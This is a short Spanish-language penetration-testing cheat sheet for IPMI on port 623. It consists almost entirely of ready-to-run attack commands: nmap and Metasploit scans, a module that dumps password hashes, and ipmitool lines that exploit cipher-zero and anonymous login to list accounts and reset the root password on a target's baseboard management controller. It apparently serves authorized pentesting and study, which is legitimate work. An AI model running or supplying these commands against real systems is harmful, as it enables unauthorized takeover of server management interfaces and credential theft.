# 623 - IPMI

## Nmap

{% code overflow="wrap" %}

```bash
nmap -sV -p 623 IP --script=ipmi-version
nmap -n -sU -p 623 IP
```

{% endcode %}

### Metasploit

```
use  auxiliary/scanner/ipmi/ipmi_version
use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
```

## Probar

### Herramienta ipmitool

```
apt-get install ipmitool
ipmitool -I lanplus -C 0 -H IP -U root -P root user list

#cambiar pw del usuario root a passw
ipmitool -I lanplus -C 0 -H IP -U root -P root user set password 2 passw
```

### Autenticación anónima

```
ipmitool -I lanplus -H IP -U '' -P '' user list

#cambia pw del usuario root a passw2
ipmitool -I lanplus -H IP -U '' -P '' user set password 2 passw2
```

References

* <https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/>
* <https://academy.hackthebox.com/module/112/section/1245>
* <https://book.hacktricks.xyz/network-services-pentesting/623-udp-ipmi>